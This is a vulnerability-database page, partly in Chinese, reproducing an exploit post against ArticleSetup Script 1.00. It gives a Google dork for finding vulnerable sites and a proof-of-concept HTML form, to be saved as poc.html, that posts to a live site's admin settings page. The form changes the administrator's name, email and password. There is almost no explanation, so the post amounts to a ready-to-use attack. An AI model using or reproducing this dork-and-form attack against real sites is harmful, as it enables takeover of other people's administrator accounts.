ArticleSetup Script Your Version: 1.00 Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034868 漏洞类型
发布时间 2018-06-02 更新时间 2018-06-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060027
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
====================================================================================================================================
| # Title     : ArticleSetup Script Your Version: 1.00 Vulnerability                                                               |
| # Author    : indoushka                                                                                                          |
| # Telegram  : @indoushka                                                                                                         |
| # Tested on : windows 10 Français V.(Pro)                                                                                        |
| # Vendor    : http://articlesynergy.com/                                                                                         |  
| # Dork      : intext:"© 2011 - Article Setup"                                                                                    |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] save as poc.html

<h2>Update Your Admin Settings</h2>
					<div class="block">
	
			
			<p style="padding-left: 15px; color: red;">Settings updated!</p>
	<form style="padding-left: 15px;" name="submission" enctype="multipart/form-data" method="POST" action="http://articles3.nichesite.org/admin/adminsettings.php">

	<b>Name:</b><br>
	<input name="name" style="width: 250px;" value="Administrator" type="text">
	
	<b>Email:</b><br>
	<input name="email" style="width: 250px;" value="indoushka4ever@gmail.com" type="text">
	
	<b>New Password:</b><br>
	<p>(Leave the password fields blank to retain old password)</p>
	<input name="pass1" style="width: 250px;" type="password">

	<b>New Password (again):</b><br>
	<input name="pass2" style="width: 250px;" type="password">

	
	<div style="clear:both"></div>


	<input name="update" id="update" type="hidden">
	<button type="submit" id="submitstyle" name="save" class="button_colour round_all"><img alt="Bended Arrow Right" src="http://articles3.nichesite.org/admin/images/icons/small/white/Bended Arrow Right.png" width="24" height="24"><span>Update Settings</span></button>

</form>

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================